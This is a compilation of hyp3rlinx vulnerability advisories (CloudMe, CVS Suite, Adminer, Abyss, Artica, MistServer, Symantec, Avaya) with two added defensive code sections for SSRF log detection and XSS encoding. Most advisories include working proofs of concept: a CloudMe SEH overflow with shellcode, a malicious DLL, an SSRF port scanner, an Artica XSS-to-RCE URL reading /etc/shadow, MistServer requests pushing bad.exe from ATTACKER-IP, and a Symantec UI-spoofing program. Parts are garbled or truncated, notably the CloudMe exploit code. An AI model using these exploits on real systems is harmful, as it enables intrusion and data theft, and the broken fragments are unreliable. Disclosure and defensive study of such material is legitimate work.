[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt [+] ISR: Apparition Security [+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669 Vendor: =www.cloudme.com Product: === CloudMe Sync <= v1.10.9 (CloudMe_1109.exe) hash: 0e83351dbf86562a70d1999df7674aa0 CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices. Vulnerability Type: === Buffer Overflow CVE Reference: == CVE-2018-6892 Security Issue: Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port , can send a malicious payload causing a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. CloudMe Sync client creates a socket listening on TCP Port (0x22B8) In Qt5Core: 00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX 00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst C:\>netstat -ano | findstr TCP0.0.0.0: 0.0.0.0:0 LISTENING 15504 TCP[::]: [::]:0 LISTENING 15504 Buffer Overflow: EIP register will be overwritten at about 1075 bytes. EAX 0001 ECX 76F698DA msvcrt.76F698DA EDX 0035 EBX 41414141 ESP 0028D470 EBP 41414141 ESI 41414141 EDI 41414141 EIP 41414141 Stack Dump: == (508.524): Access violation - code c005 (first/second chance not available) *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for ntdll.dll - eax= ebx= ecx=41414141 edx=778f353d esi= edi= eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit. e.g. 6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) 00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) 61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) 0day Exploit POC: == import socket,struct print 'CloudMe Sync v1.10.9' print 'Unauthenticated Remote Buffer Overflow 0day' print 'Discovery/credits: hyp3rlinx' print 'apparition security\n' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") ip=raw_input('[+] CloudMe Target IP> ') nseh="\xEB\x06"+"\x90"*2#JMP seh=struct.pack('https://www.cloudme.com/en/sync#https://blogs.securiteam.com/index.php/archives/3669 POC Video URL: 
https://vimeo.com/255280060

Network Access:
Remote

Severity:
High

Disclosure Timeline:
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security's SSD program for the help with co-ordination of this vulnerability. More details can be found on their blog at: https://blogs.securiteam.com/index.php/archives/3669
February 11, 2018 : Public Disclosure
[FD] CVS Suite 2009R2 Insecure Library Loading CVE-2018-6461
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVS-SUITE-2009R2-INSECURE-LIBRARY-LOADING-CVE-2018-6461.txt
[+] ISR: Apparition Security

Vendor:
march-hare.com

Product:
WINCVS 2009R2

CVS Suite is a modern versioning system that combines the power and stability of CVS with modern easy-to-use client software and support for Configuration Management best practice. As the newest major release of the world's most popular versioning system, CVS Suite 2009R2 continues CVSNT's blazing pace of innovation with new features and usability enhancements.

Vulnerability Type:
Insecure Library Loading

CVE Reference:
CVE-2018-6461

Security Issue:
A non-privileged user can write files to "C:\ProgramData\March Hare\myrepo\CVSROOT" to gain authenticated access with the same privileges as the currently logged-on user; in addition, they can run arbitrary code with the same privileges as the victim.

e.g.
C:\ProgramData\March Hare\myrepo\CVSROOT>cacls * | more
C:\ProgramData\March Hare\myrepo\CVSROOT\CVS Everyone:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F

WinCVS:
Attackers can place malicious DLLs in CVSROOT and wait for a CVS user to run WinCVS; when the user browses to a repository in CVSROOT and right-clicks on CVSROOT or a CVSROOT file to 'Open in new instance' (or presses Ctrl+F2), the attacker's DLL will execute. An attacker supplied DLL, e.g. 'python31.dll', will also execute if placed on the victim's desktop and the user initially opens 'wincvs2.exe'. Basically, anywhere or any repository we can place a malicious DLL that they can browse to should work.

WinMerge 2009 also vulnerable:
If a WinMerge project file is opened from a remote share where specific attacker supplied DLLs have been placed, it will load and execute them.

vuln DLL(s):
tcl87.dll
python30.dll
python31.dll
References:
http://march-hare.com/cvspro/vulnwincvs.htm

Exploit/POC:
Create "python31.dll"

#include <windows.h>
//gcc -c python31.c
//gcc -shared -o python31.dll python31.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL, "Done!", "hyp3rlinx", MB_OK);
            break;
    }
    return 0;
}

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: January 26, 2018
Vendor acknowledgement: January 27, 2018
Vendor releases fix: February 2, 2018
February 5, 2018 : Public Disclosure
[FD] Adminer <= v4.3.1 Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security

Vendor:
www.adminer.org

Product:
Adminer <= v4.3.1

Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consists of a single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.
https://github.com/vrana/adminer/releases/

Vulnerability Type:
Server Side Request Forgery

CVE Reference:
N/A

Security Issue:
Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to identify internal hosts and perform port scanning of other servers for reconnaissance purposes.

Funny thing is, Adminer throttles invalid login attempts but allows endless unauthorized HTTP connections to other systems as long as you're not trying to authenticate to Adminer itself. In situations where Adminer can talk to a server that we are not allowed to (ACL) and where we can talk to the server hosting Adminer, it can do recon for us.

Recently in a LAN I was firewalled off from a server; however, there was another server running Adminer that I could talk to. Also, that Adminer server could talk to the target. Since Adminer suffers from Server-Side Request Forgery, I could scan for open ports and gather information from that firewalled-off, protected server. This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east-west connections. However, sysadmins who check the logs on the server hosting the Adminer application will see our port scans.
root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET ///?server=TARGET-IP:21&username= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET ///?server=TARGET-IP:22&username= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET ///?server=TARGET-IP:23&username= HTTP/1.1" 403 6021 "-" "-"

Details:
By comparing the different failed error responses from Adminer when making bogus SSRF connections, I figured out which ports are open/closed.

Port open ==> Lost connection to MySQL server at 'reading initial communication packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine actively refused it
Port closed ==> A connection attempt failed.

This worked so well for me I wrote a quick port scanner, 'PortMiner', as a proof of concept that leverages the Adminer SSRF vulnerability.

PortMiner observations:
No response ('read operation timed out') means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning Web server ports like 80, 443. However, when we get error responses like the ones above from the server, we can be fairly certain a port is either open or closed.

Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p
Use range -

Exploit/POC:

import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call

#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=
#D1rty0Tis says hi.

#timeout
MAX_TIME=32

#ports to log
port_lst=[]

#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']

BANNER=''' _ __ __ _ | _ \ | | | \/ (_) | |__) |__ _ __| |_| \ / |_ _ __ ___ _ __ | ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| | | | (_) | | | |_| | | | | | | | __/ | |_| \___/|_| \__|_| |_|_|_| |_|\___|_| '''

def info():
    print "\nPortMiner depends on Error messages to determine open/closed ports."
    print "Read operations reported 'timed out' may be open/filtered.\n"

def greet():
    print 'Adminer Unauthenticated SSRF Port Scanner Tool'
    print 'Targets Adminer used for MySQL administration\n'
    print 'by hyp3rlinx - apparition security'
    print '--
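The advisory notes that the one place this SSRF port sweep does leave a trace is the Apache log on the host running Adminer. The following is an added detection example, not part of the advisory or the PortMiner tool: it parses vhost-combined access log lines, pulls the `server=HOST:PORT` query parameter Adminer uses, and flags any client that has probed several distinct ports on the same host. The log lines are constructed after the excerpt above (the `ATTACKER-IP`/`TARGET-IP` placeholders are kept, the stripped timezone is filled with `+0000`), and the `min_ports` threshold and the assumption that a bare hostname means the default MySQL port 3306 are mine.

```python
"""Detect Adminer-style SSRF port sweeps in Apache access logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Apache "vhost_combined" line: vhost client ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log, modelled on the advisory's other_vhosts_access.log excerpt.
SAMPLE_LOG = """\
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +0000] "GET ///?server=TARGET-IP:21&username= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +0000] "GET ///?server=TARGET-IP:22&username= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +0000] "GET ///?server=TARGET-IP:23&username= HTTP/1.1" 403 6021 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:27:30 +0000] "GET ///?server=TARGET-IP:3306&username= HTTP/1.1" 403 6021 "-" "-"
localhost:12322 10.0.0.5 - - [2/Jan/2018:14:28:00 +0000] "GET /?server=localhost&username=root HTTP/1.1" 200 2211 "-" "-"
localhost:12322 10.0.0.7 - - [2/Jan/2018:14:29:00 +0000] "GET /index.html HTTP/1.1" 200 100 "-" "-"
"""

DEFAULT_MYSQL_PORT = 3306  # assumption: a bare hostname in server= goes to MySQL's default port


def parse_server_param(target):
    """Return (host, port) from Adminer's ``server`` query parameter, or None
    when the request does not carry one (or the port is not numeric)."""
    qs = parse_qs(urlparse(target).query)
    server = qs.get("server", [None])[0]
    if not server:
        return None
    host, sep, port = server.rpartition(":")
    if not sep:
        return server, DEFAULT_MYSQL_PORT
    if not port.isdigit():
        return None
    return host, int(port)


def find_ssrf_sweeps(log_text, min_ports=3):
    """Group server= targets per (client, host) and report the pairs where one
    client asked Adminer to connect to at least ``min_ports`` distinct ports.
    Returns {(client, host): sorted list of probed ports}."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand; skip rather than fail
        parsed = parse_server_param(m.group("target"))
        if parsed is None:
            continue  # ordinary request with no outbound target
        host, port = parsed
        probes[(m.group("client"), host)].add(port)
    return {key: sorted(ports) for key, ports in probes.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    for (client, host), ports in find_ssrf_sweeps(SAMPLE_LOG).items():
        print("possible SSRF port sweep: %s -> %s ports %s" % (client, host, ports))
```

The same grouping works on a live log by piping `other_vhosts_access.log` into `find_ssrf_sweeps`; a legitimate administrator connects to one or two database ports, so a client touching three or more distinct ports on one host is a strong signal regardless of whether Adminer answered 403 or 200.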
[FD] Abyss Web Server < v2.11.6 Memory Heap Corruption
[+] Credits: John Page (aka HyP3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt
[+] ISR: ApparitionSec

Vendor:
aprelium.com

Product:
Abyss Web Server < v2.11.6

Vulnerability Type:
Memory Heap Corruption

CVE Reference:
N/A

Security Issue:
It is possible to corrupt heap memory of the Abyss Web Server by sending specially crafted HTML in repeated HTTP POST requests. Users should upgrade to the latest version, v2.11.6.

GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP:
msvcrt!memcpy+5a
75e49b60 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD: -- (.exr 0x)
ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x005a)
ExceptionCode: c005 (Access violation)
ExceptionFlags:
NumberParameters: 2
Parameter[0]:
Parameter[1]: 003b9000
Attempt to read from address 003b9000

CONTEXT: -- (.cxr 0x0;r)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404 add esp,4

PROCESS_NAME: abyssws.exe

ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:

EXCEPTION_PARAMETER2: 003b9000

READ_ADDRESS: 003b9000

FOLLOWUP_IP:
abyssws+413d9
004413d9 59 pop ecx

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

APP: abyssws.exe

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre

LAST_CONTROL_TRANSFER: from 0043f840 to 75e49b60

FAULTING_THREAD:

BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE

PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

STACK_TEXT:
777542a8 776cd9bc ntdll!RtlFreeHeap+0x64
777542ac 75e498cd msvcrt!free+0xcd
777542b0 004413d9 abyssws+0x413d9
777542b4 004089d0 abyssws+0x89d0
777542b8 0040a607 abyssws+0xa607
777542bc 0040bd58 abyssws+0xbd58
777542c0 0040cb5b abyssws+0xcb5b

SYMBOL_STACK_INDEX: 2

SYMBOL_NAME: abyssws+413d9

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: abyssws

IMAGE_NAME: abyssws.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 5807a3cb

STACK_COMMAND: dps 777542a8 ; kb

FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c005_abyssws.exe!Unknown

BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9

ANALYSIS_SOURCE: UM

FAILURE_ID_HASH_STRING: um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c005_abyssws.exe!unknown

FAILURE_ID_HASH: {0ba3122b-4351-5a85-a0ea-294a6ce77042}

Followup: MachineOwner
-

///
The stored exception information can be accessed via .ecxr.
(2740.30b8): Access violation - code c005 (first/second chance not available)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404 add esp,4

0:011> !load winext/msec
0:011> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x0250 (Hash=0xb1db8cd3.0x508907b2)

This is a read access violation in a block data move, and is therefore classified as probably exploitable.

References:
https://aprelium.com/news/abws2-11-6.html

Exploit/POC:
Cause Heap Corruption in Abyss Server.

//Abyss Web Server Memory (heap) Corruption POC
//Discover by hyp3rlinx
//Error code: 0xc374 is STATUS_HEAP_CORRUPTION
//0xc374 - heap has been corrupted.
//===

window.onerror=function(){ return true }

var target='http://VICTIM-IP:/hosts/host@0/edit/ipcontrol';

function mk_iframe_targets(f){
    var tmp = document.createElement('IFRAME')
    tmp.style='display:none'
    tmp.name='hidden-frame'+f
    return tmp
}

function mk_inputs(id
[FD] Artica Web Proxy v3.06 Remote Code Execution / CVE-2017-17055
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec

Vendor:
www.articatech.com

Product:
Artica Web Proxy v.3.06.112216

Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution, usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past 10 years as an Open Source Project to help SMEs and public bodies protect both their organizations and employees from risks posed by the Internet.

Vulnerability Type:
Remote Code Execution

CVE Reference:
CVE-2017-17055

Security Issue:
Artica offers a web based command line emulator, 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. However, Artica fails to sanitize the HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'. Therefore, when authenticated users click an attacker supplied link or visit a malicious webpage, attacker supplied JavaScript code executes in their session, which is then used to execute unauthorized operating system commands (RCE) on the affected Artica Web Proxy Server by abusing the system.terminal.php functionality. The result is attacker takeover of the Artica server.

Exploit/POC:

1) Steal the Artica server's "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to the /tmp dir.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure
[FD] Mist Server v2.12 Unauthenticated Persistent XSS CVE-2017-16884
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec

Vendor:
mistserver.org

Product:
MistServer v2.12

MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).

Vulnerability Type:
Unauthenticated Persistent XSS

CVE Reference:
CVE-2017-16884

Security Issue:
Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads get stored in the server logs as failed-authentication alerts. MistServer echoes the unsanitized payloads back in the MistServer web interface automatically, because the UI refreshes itself every few seconds, thereby executing arbitrary attacker supplied code.

References:
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21

Exploit/POC:

import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":";http://ATTACKER-IP\'>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":";http://ATTACKER-IP/bad.exe\'>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":";alert(document.body.innerHTML)"}}')

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure
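The Artica and MistServer advisories above share one root cause: an attacker-controlled string (a `$_GET` parameter in one case, a username copied into the failed-authentication log in the other) is written into a page without encoding for the context it lands in. The following is an added example, not code from either project: a small model of both flows with the unencoded rendering beside the fixed one. The Artica payload starts with `</script>`, so the fix for a value placed inside a `<script>` string is a JSON literal with `<`, `>` and `&` escaped as `\uXXXX`, not HTML entity encoding, which would corrupt the string; the log panel, which is HTML body context, is fixed with `html.escape`. The two request strings, the log-line wording and the page markup are constructed for the demo and are not the projects' real templates.

```python
"""Context-aware output encoding for values that reach a web UI (added example)."""
import html
import json
from urllib.parse import parse_qs, quote

# --- Constructed request strings modelled on the two advisories' PoCs ---------
ARTICA_QUERY = "username-form-id=" + quote('</script><script>alert(1)</script><script>')
MIST_QUERY = "command=" + quote(json.dumps(
    {"authorize": {"password": "666", "username": '<iframe src="http://ATTACKER-IP">'}}))


def js_string_literal(value):
    """Encode ``value`` for use inside a <script> block as a JS string literal.
    json.dumps handles quotes, backslashes and control characters and, with the
    default ensure_ascii=True, the U+2028/2029 line terminators; the explicit
    replacements stop '</script' or '<!--' from ever appearing in the output."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_form_vulnerable(query_string):
    """Model of the flaw: the parameter is interpolated raw into a script block,
    so a value beginning with '</script>' closes it and starts attacker script."""
    form_id = parse_qs(query_string).get("username-form-id", [""])[0]
    return '<script>var formId="%s";</script>' % form_id


def render_form_fixed(query_string):
    """Same page with the value emitted as a properly encoded JS string literal."""
    form_id = parse_qs(query_string).get("username-form-id", [""])[0]
    return '<script>var formId=%s;</script>' % js_string_literal(form_id)


def log_failed_auth(query_string, log):
    """Model of the API handler: the username from a failed 'authorize' command
    is appended verbatim to the log (the wording of the entry is constructed).
    Logging the raw value is fine; the bug is rendering it later without encoding."""
    command = json.loads(parse_qs(query_string)["command"][0])
    username = command["authorize"]["username"]
    log.append("Failed authorization for user %s" % username)
    return username


def render_log_panel(log, escape=True):
    """Render log entries into the admin UI. escape=False reproduces the flaw;
    the default HTML-encodes every entry because this is body/text context."""
    rows = []
    for entry in log:
        rows.append("<li>%s</li>" % (html.escape(entry, quote=True) if escape else entry))
    return "<ul>%s</ul>" % "".join(rows)


if __name__ == "__main__":
    print("reflected, vulnerable:", render_form_vulnerable(ARTICA_QUERY))
    print("reflected, fixed:     ", render_form_fixed(ARTICA_QUERY))
    log = []
    log_failed_auth(MIST_QUERY, log)
    print("stored, vulnerable:   ", render_log_panel(log, escape=False))
    print("stored, fixed:        ", render_log_panel(log))
```

The test of a correct encoder is structural: after the fix the page contains exactly the one `<script` it started with, and the log panel contains `&lt;iframe` rather than `<iframe`, whatever the attacker put in the username. Escaping at render time rather than at log-write time also keeps the log itself accurate for incident response.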
[FD] Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec

Vendor:
www.symantec.com

Product:
Symantec Endpoint Protection v12.1.6 (12.1 RU6 MP5)
Symantec 12.1.7004.6500

Vulnerability Type:
Tamper-Protection Bypass
Denial Of Service / Message Spoof

CVE Reference:
CVE-2017-6331
SSG16-041

Security Issue:
Symantec Endpoint Protection (SEP) does not validate where WinAPI messages come from (lack of UIPI). Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close the SEP UI, denying the end user the ability to scan / run the EP AntiVirus protection. Spoofed messages could also potentially inform a user that a scan was clean.

Unfortunately Symantec's advisory left out details of the Denial Of Service, as well as minimizing the amount of text a malware could inject into the UI, which would compromise the integrity of the Symantec Endpoint Protection Control Panel user interface.

References:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20171106_00

Exploit/POC:

1) Compile the C program below; it targets various components of SEP, so comment out what you want to send to the UI.
2) Try to open the Symantec Endpoint UI and you will be denied.
3) Or inject attacker supplied messages instructing the user that the file is clean, etc.

#include <windows.h>
#include
#define VICTIM "DevViewer.exe"

//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7
//How: FindWindow / SendMessage Win32 API
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
void main(void){
    while(1){
        HWND hWnd = FindWindow(NULL, TEXT("Status - Symantec Endpoint Protection"));
        if(hWnd!=NULL){
            //This injects arbitrary messages to SEP UI.
            SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
            //This prevents a user from being able to run AV scans and renders SEP UI useless
            //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
        }
        //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
        HWND x = FindWindow(NULL, TEXT("DevViewer"));
        if(x!=NULL){
            SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
        }
        HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
        SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
        HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
        SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
        HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
        if(x4!=NULL){
            SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
        }
        sleep(1);
    }
}

Network Access:
Local

Severity:
Medium

Disclosure Timeline:
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017 : Public Disclosure
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: apparitionSec

Vendor:
www.avaya.com

Product:
Avaya IP Office (IPO) v9.1.0 - 10.1

